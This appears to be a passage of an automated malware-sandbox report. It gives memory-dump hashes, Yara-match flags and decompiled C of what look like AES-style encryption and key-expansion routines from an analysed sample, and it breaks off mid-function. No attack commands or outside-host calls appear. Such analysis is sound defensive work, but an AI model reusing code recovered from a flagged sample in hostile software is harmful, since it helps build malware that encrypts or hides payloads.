                                                        • Opcode Fuzzy Hash: 79c842ff115746f421f27fa1ff69aa9dfa9a290199830f0e4c8d710c8fdb2e1b
                                                        • Instruction Fuzzy Hash: 65629072804A4AEFCF15CF48D5D14AEFBB2FA55304B59C2A8C89A27614D331BA54CBD2
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                                        • Instruction ID: 8105c557ab85b7292f4c61937c43d24a40909692a6b6dd5c4a593eb44872254c
                                                        • Opcode Fuzzy Hash: bf3aace0eee00dd7d8b9421bd2df7728fa7323d9af3e0e213de9131a621edcaa
                                                        • Instruction Fuzzy Hash: 6C128273B716180BC344CD7DCC852C27293ABD452875FCA3CAD68CB706F66AED1A6684
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a6d6ffe223e9015b44a93af88b1fc73398fb0eaeb0012e561437e6c9f6b0c3db
                                                        • Instruction ID: f7d0f01dfd0485d4f3db1378cc40fd95ac657655eeeabfd2fbc925eade051d75
                                                        • Opcode Fuzzy Hash: a6d6ffe223e9015b44a93af88b1fc73398fb0eaeb0012e561437e6c9f6b0c3db
                                                        • Instruction Fuzzy Hash: 3F226971D0021CCFDB24CF98C984AEDBBF1FF09314F1581AAE949AB291D375A989CB54
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c8112632399dcca40e4c8963fe43f78b76ace8ee353c95f649946a5a95257a97
                                                        • Instruction ID: 3dd0cb2d584ac58e8e5de6db9bdc0d753e1f4f7cdcd845d89af71fd52ada3449
                                                        • Opcode Fuzzy Hash: c8112632399dcca40e4c8963fe43f78b76ace8ee353c95f649946a5a95257a97
                                                        • Instruction Fuzzy Hash: 8E028033D5A7B74B8B754EB944E072A7AE09E0269231F47E9DDC03F286C116DD0E96E0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 561cad2a5e8b30414fa65e3cb88d36de2e60594a1e312079c5dcf43ae4a29a94
                                                        • Instruction ID: 74bb6d467a1a8d8ba746a3fc00b7425d2c27e42b4cda6e1e78afd0e40692b54a
                                                        • Opcode Fuzzy Hash: 561cad2a5e8b30414fa65e3cb88d36de2e60594a1e312079c5dcf43ae4a29a94
                                                        • Instruction Fuzzy Hash: 391298702146519ADB28DF29C494776F7E1EF05300F1888EBE8E68F796E334E855DB60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7a0b1ebce3bee567b6734cb99d1a51d83780df2a9106d9ef7672b7d39d00f278
                                                        • Instruction ID: d6ca6452a16f1a67bf381d213ad90eb805be5a4f733106559102b4982ac80379
                                                        • Opcode Fuzzy Hash: 7a0b1ebce3bee567b6734cb99d1a51d83780df2a9106d9ef7672b7d39d00f278
                                                        • Instruction Fuzzy Hash: 1D028F7090013A9ACF349F54C8887B9B7F1FF18701F5481EAE959A72A1E7348ED1DBA1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        C-Code - Quality: 27%
                                                        			E00402FB0(void* __eax, signed int* __ecx, signed int* __edx, signed int _a4, signed int* _a8) {
                                                        				signed int _v8;
                                                        				signed int _v12;
                                                        				signed int _v16;
                                                        				signed int _v20;
                                                        				signed int _v24;
                                                        				void* _t273;
                                                        				signed int _t274;
                                                        				signed int _t282;
                                                        				signed int* _t358;
                                                        				signed int _t383;
                                                        				signed int* _t409;
                                                        				signed int _t411;
                                                        				signed int _t428;
                                                        				signed int _t457;
                                                        				signed int _t477;
                                                        				signed int _t559;
                                                        				signed int _t602;
                                                        
                                                        				_t273 = __eax;
                                                        				asm("ror edi, 0x8");
                                                        				asm("rol edx, 0x8");
                                                        				_t457 = ( *__edx & 0xff00ff00 |  *__edx & 0x00ff00ff) ^  *__ecx;
                                                        				asm("ror ebx, 0x8");
                                                        				asm("rol edx, 0x8");
                                                        				_v20 = _t457;
                                                        				_v8 = (__edx[1] & 0xff00ff00 | __edx[1] & 0x00ff00ff) ^ __ecx[1];
                                                        				asm("ror ebx, 0x8");
                                                        				asm("rol edx, 0x8");
                                                        				_t282 = (__edx[2] & 0xff00ff00 | __edx[2] & 0x00ff00ff) ^ __ecx[2];
                                                        				asm("ror esi, 0x8");
                                                        				asm("rol edx, 0x8");
                                                        				_v12 = (__edx[3] & 0xff00ff00 | __edx[3] & 0x00ff00ff) ^ __ecx[3];
                                                        				asm("ror edx, 0x10");
                                                        				asm("ror esi, 0x8");
                                                        				asm("rol esi, 0x8");
                                                        				_v24 = _t282;
                                                        				_t428 =  *(__eax + 4 + (_t282 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[4];
                                                        				asm("ror esi, 0x10");
                                                        				asm("ror ebx, 0x8");
                                                        				asm("rol ebx, 0x8");
                                                        				_t602 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t282 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[5];
                                                        				asm("ror ebx, 0x8");
                                                        				asm("ror edi, 0x10");
                                                        				asm("rol edi, 0x8");
                                                        				_v16 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t457 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ __ecx[6];
                                                        				asm("ror edi, 0x10");
                                                        				asm("ror ebx, 0x8");
                                                        				asm("rol ebx, 0x8");
                                                        				_t409 =  &(__ecx[8]);
                                                        				_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                                        				_t477 = (_a4 >> 1) - 1;
                                                        				_a4 = _t477;
                                                        				if(_t477 != 0) {
                                                        					do {
                                                        						asm("ror edi, 0x10");
                                                        						asm("ror ebx, 0x8");
                                                        						asm("rol ebx, 0x8");
                                                        						_v20 =  *(__eax + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) ^  *_t409;
                                                        						asm("ror edi, 0x10");
                                                        						asm("ror ebx, 0x8");
                                                        						asm("rol ebx, 0x8");
                                                        						_v8 =  *(__eax + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[1];
                                                        						asm("ror ebx, 0x8");
                                                        						asm("ror edi, 0x10");
                                                        						asm("rol edi, 0x8");
                                                        						_t383 =  *(__eax + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t602 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[2];
                                                        						asm("ror edi, 0x10");
                                                        						asm("ror edx, 0x8");
                                                        						asm("rol edx, 0x8");
                                                        						_v24 = _t383;
                                                        						_t559 =  *(__eax + 4 + (_t602 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t428 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v16 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[3];
                                                        						asm("ror edx, 0x10");
                                                        						asm("ror esi, 0x8");
                                                        						asm("rol esi, 0x8");
                                                        						_t428 =  *(__eax + 4 + (_t383 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t559 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[4];
                                                        						asm("ror esi, 0x10");
                                                        						asm("ror ebx, 0x8");
                                                        						asm("rol ebx, 0x8");
                                                        						_t602 =  *(__eax + 4 + (_t559 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_t383 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[5];
                                                        						_v12 = _t559;
                                                        						asm("ror edi, 0x8");
                                                        						asm("ror ebx, 0x10");
                                                        						asm("rol ebx, 0x8");
                                                        						_v16 =  *(__eax + 4 + (_t559 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v8 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 >> 0x00000018 & 0x000000ff) * 4) ^ _t409[6];
                                                        						asm("ror ebx, 0x10");
                                                        						asm("ror edi, 0x8");
                                                        						asm("rol edi, 0x8");
                                                        						_t409 =  &(_t409[8]);
                                                        						_t205 =  &_a4;
                                                        						 *_t205 = _a4 - 1;
                                                        						_v12 =  *(__eax + 4 + (_v8 >> 0x00000008 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v20 >> 0x00000010 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v24 & 0x000000ff) * 4) ^  *(__eax + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) ^  *(_t409 - 4);
                                                        					} while ( *_t205 != 0);
                                                        				}
                                                        				asm("ror ebx, 0x8");
                                                        				asm("rol edi, 0x8");
                                                        				 *_a8 = (( *(_t273 + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0xff00ff00 | (( *(_t273 + 4 + (_t428 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t602 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v16 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_v12 & 0x000000ff) * 4) & 0x000000ff ^  *_t409) & 0x00ff00ff;
                                                        				asm("ror ebx, 0x8");
                                                        				asm("rol edi, 0x8");
                                                        				_a8[1] = (( *(_t273 + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t428 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0xff00ff00 | (( *(_t273 + 4 + (_t602 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v16 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_v12 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t428 & 0x000000ff) * 4) & 0x000000ff ^ _t409[1]) & 0x00ff00ff;
                                                        				asm("ror ebx, 0x8");
                                                        				asm("rol edi, 0x8");
                                                        				_t358 = _a8;
                                                        				_t358[2] = (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t602 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0xff00ff00 | (( *(_t273 + 4 + (_v16 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_v12 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t428 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t273 + 5 + (_t602 & 0x000000ff) * 4) & 0x000000ff ^ _t409[2]) & 0x00ff00ff;
                                                        				_t274 =  *(_t273 + 5 + (_v16 & 0x000000ff) * 4) & 0x000000ff;
                                                        				asm("ror ecx, 0x8");
                                                        				_t411 = (( *(_t273 + 4 + (_v12 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t273 + 4 + (_t428 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t273 + 4 + (_t602 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^ _t274 ^ _t409[3]) & 0xff00ff00;
                                                        				asm("rol edi, 0x8");
                                                        				 *_t358 =  *_t358 + _t411;
                                                        				asm("iretd");
                                                        				_t358[3] = _t411;
                                                        				return _t274;
                                                        			}





















                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                        • Instruction ID: 3a980b568be2ae1ecdc62ef5b70c599cea3cbb84bd4cfa04f309e58bee3fdca8
                                                        • Opcode Fuzzy Hash: 937a55679482902739b3c28cbd4d4033f685ec815d12dd2f022c6521ee9f93e4
                                                        • Instruction Fuzzy Hash: 37026E73E547164FE720CE4ACDC4725B3A3EFC8301F5B81B8CA142B613CA39BA525A90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bb58d2bd9c842f9be05c8f1d0f1a847d1ab92e89daf1d55b05597ca56ccec852
                                                        • Instruction ID: b97e7ad719b41d8c59167cb08c46832efaba449de07e46820f642eb5d334e1e1
                                                        • Opcode Fuzzy Hash: bb58d2bd9c842f9be05c8f1d0f1a847d1ab92e89daf1d55b05597ca56ccec852
                                                        • Instruction Fuzzy Hash: 47E1BF342146598FD728CF19C0A06B2B7E1EF55350F14C4DEEAE68B692E334EC5AEB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: a18cfbab279ac3d3be162841f96d0eac2a379d6d98e0f297657f4362180874eb
                                                        • Instruction ID: f08d931a800b1e2c6cd32e7957e556e724bd3248f7273126b16dce85bfebcd80
                                                        • Opcode Fuzzy Hash: a18cfbab279ac3d3be162841f96d0eac2a379d6d98e0f297657f4362180874eb
                                                        • Instruction Fuzzy Hash: 23C10F70508256EEDB24CF24C885BBBBBF5EF06300F1444D9E8968BA81D375E845EBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 30a80c71e25019c4327a82a121550cc67116fa97d44b50b1c6140f21b1af2549
                                                        • Instruction ID: 2d520053c9884785eb297a53a6fddec0c8d2aa0465f15fc1c4fb789e1a3ca94d
                                                        • Opcode Fuzzy Hash: 30a80c71e25019c4327a82a121550cc67116fa97d44b50b1c6140f21b1af2549
                                                        • Instruction Fuzzy Hash: 65B18C31A002559BDB34CF68CC84BBAB3F9EF45710F1485DAE94AE7291D7749D84CB21
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 246a888ca68a1dc085ffaae3e0f35ca3382ab1cb49dd86c4a39abba739f333a6
                                                        • Instruction ID: 57ae3455809d65e7da32684b46644370f9a7d4ab1c311bfd074a9bd5ab62f315
                                                        • Opcode Fuzzy Hash: 246a888ca68a1dc085ffaae3e0f35ca3382ab1cb49dd86c4a39abba739f333a6
                                                        • Instruction Fuzzy Hash: CEC1BF70A00615CFCB24CF59C4807ACB7F2FF89324F2882AAD865AB791D734AD46DB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 10e585330df50dfe27eda60c1b483f0f94712ef40964151c60a93076343f7544
                                                        • Instruction ID: 43dcec595f30a72e029afed9c8958a483576649462f7977fda2bb663962d0ae8
                                                        • Opcode Fuzzy Hash: 10e585330df50dfe27eda60c1b483f0f94712ef40964151c60a93076343f7544
                                                        • Instruction Fuzzy Hash: 7991C171D0425A8BCF34DF94C4906FDB7F1FF55700FA840AAD892A7286EB349982DB61
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
                                                        • Instruction ID: 709d31cdffada1fb948f9f50374b5d9b0e073c48dcab360dab2321aacc592b8f
                                                        • Opcode Fuzzy Hash: 7d8e1e2a5a6a4964145bdf9193a246bda9ec3521fead953568eb1d9add5f077b
                                                        • Instruction Fuzzy Hash: 287158316192558FDB159A38C4D06BE37E2EB92304B34C2F6E466CB78ADA70D847E351
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541893417.0000000000B30000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: true
                                                        • Associated: 0000000B.00000002.541859378.0000000000B20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542443702.0000000000C10000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542456721.0000000000C20000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542476481.0000000000C24000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542501441.0000000000C27000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542519253.0000000000C30000.00000040.00000001.sdmp
                                                        • Associated: 0000000B.00000002.542572972.0000000000C90000.00000040.00000001.sdmp

                                                        C-Code - Quality: 67%
                                                        			E00402D90(intOrPtr _a4, signed int* _a8, signed int* _a12, intOrPtr _a16) {
                                                        				signed int _t66;
                                                        				signed int* _t69;
                                                        				signed int* _t81;
                                                        				signed int _t94;
                                                        				signed int _t96;
                                                        				signed int _t106;
                                                        				signed int _t108;
                                                        				signed int* _t110;
                                                        				signed int _t127;
                                                        				signed int _t129;
                                                        				signed int _t133;
                                                        				signed int _t152;
                                                        				intOrPtr _t171;
                                                        
                                                        				_t81 = _a12;
                                                        				_t110 = _a8;
                                                        				asm("ror esi, 0x8");
                                                        				asm("rol eax, 0x8");
                                                        				 *_t110 =  *_t81 & 0xff00ff00 |  *_t81 & 0x00ff00ff;
                                                        				asm("ror edi, 0x8");
                                                        				asm("rol esi, 0x8");
                                                        				_t110[1] = _t81[1] & 0xff00ff00 | _t81[1] & 0x00ff00ff;
                                                        				asm("ror edi, 0x8");
                                                        				asm("rol esi, 0x8");
                                                        				_t110[2] = _t81[2] & 0xff00ff00 | _t81[2] & 0x00ff00ff;
                                                        				_t66 =  &(_t110[1]);
                                                        				asm("ror edi, 0x8");
                                                        				asm("rol esi, 0x8");
                                                        				_t110[3] = _t81[3] & 0xff00ff00 | _t81[3] & 0x00ff00ff;
                                                        				asm("ror edi, 0x8");
                                                        				asm("rol esi, 0x8");
                                                        				_t110[4] = _t81[4] & 0xff00ff00 | _t81[4] & 0x00ff00ff;
                                                        				asm("ror edi, 0x8");
                                                        				asm("rol esi, 0x8");
                                                        				_t110[5] = _t81[5] & 0xff00ff00 | _t81[5] & 0x00ff00ff;
                                                        				asm("ror edi, 0x8");
                                                        				asm("rol esi, 0x8");
                                                        				_t110[6] = _t81[6] & 0xff00ff00 | _t81[6] & 0x00ff00ff;
                                                        				asm("ror esi, 0x8");
                                                        				asm("rol ecx, 0x8");
                                                        				_t110[7] = _t81[7] & 0xff00ff00 | _t81[7] & 0x00ff00ff;
                                                        				if(_a16 != 0x100) {
                                                        					L4:
                                                        					return _t66 | 0xffffffff;
                                                        				} else {
                                                        					_t171 = _a4;
                                                        					_t69 = 0;
                                                        					_a12 = 0;
                                                        					while(1) {
                                                        						_t152 =  *(_t66 + 0x18);
                                                        						_t94 = ( *(_t171 + 4 + (_t152 >> 0x00000010 & 0x000000ff) * 4) & 0xffff0000 ^ ( *(_t171 +  &(_t69[0x241])) & 0x000000ff) << 0x00000010) << 0x00000008 ^  *(_t171 + 4 + (_t152 >> 0x00000008 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 5 + (_t152 >> 0x00000018 & 0x000000ff) * 4) & 0x000000ff ^  *(_t171 + 4 + (_t152 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t66 - 4);
                                                        						_t127 =  *_t66 ^ _t94;
                                                        						 *(_t66 + 0x1c) = _t94;
                                                        						_t96 =  *(_t66 + 4) ^ _t127;
                                                        						 *(_t66 + 0x20) = _t127;
                                                        						_t129 =  *(_t66 + 8) ^ _t96;
                                                        						 *(_t66 + 0x24) = _t96;
                                                        						 *(_t66 + 0x28) = _t129;
                                                        						if(_t69 == 6) {
                                                        							break;
                                                        						}
                                                        						_t106 = ( *(_t171 + 4 + (_t129 >> 0x00000018 & 0x000000ff) * 4) & 0xffff0000) << 0x00000008 ^  *(_t171 + 4 + (_t129 >> 0x00000010 & 0x000000ff) * 4) & 0x00ff0000 ^  *(_t171 + 4 + (_t129 >> 0x00000008 & 0x000000ff) * 4) & 0x0000ff00 ^  *(_t171 + 5 + (_t129 & 0x000000ff) * 4) & 0x000000ff ^  *(_t66 + 0xc);
                                                        						_t133 =  *(_t66 + 0x10) ^ _t106;
                                                        						 *(_t66 + 0x2c) = _t106;
                                                        						_t108 =  *(_t66 + 0x14) ^ _t133;
                                                        						 *(_t66 + 0x34) = _t108;
                                                        						_t69 =  &(_a12[0]);
                                                        						 *(_t66 + 0x30) = _t133;
                                                        						 *(_t66 + 0x38) = _t108 ^ _t152;
                                                        						_t66 = _t66 + 0x20;
                                                        						_a12 = _t69;
                                                        						if(_t69 < 7) {
                                                        							continue;
                                                        						} else {
                                                        							goto L4;
                                                        						}
                                                        						goto L6;
                                                        					}
                                                        					return 0xe;
                                                        				}
                                                        				L6:
                                                        			}

















                                                        Memory Dump Source
                                                        • Source File: 0000000B.00000002.541476274.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                        Yara matches

                                                        C-Code - Quality: 58%
                                                        			E0041E814(void* __eax, signed int __ebx, void* __ecx, signed char __edx, void* __edi, signed int __esi) {
                                                        				signed char _t18;
                                                        				void* _t19;
                                                        				signed char _t20;
                                                        				signed char _t26;
                                                        				signed char _t27;
                                                        				signed int _t37;
                                                        				signed int _t38;
                                                        				signed int _t40;
                                                        				void* _t42;
                                                        				signed int _t43;
                                                        				signed int _t49;
                                                        
                                                        				_t38 = __esi;
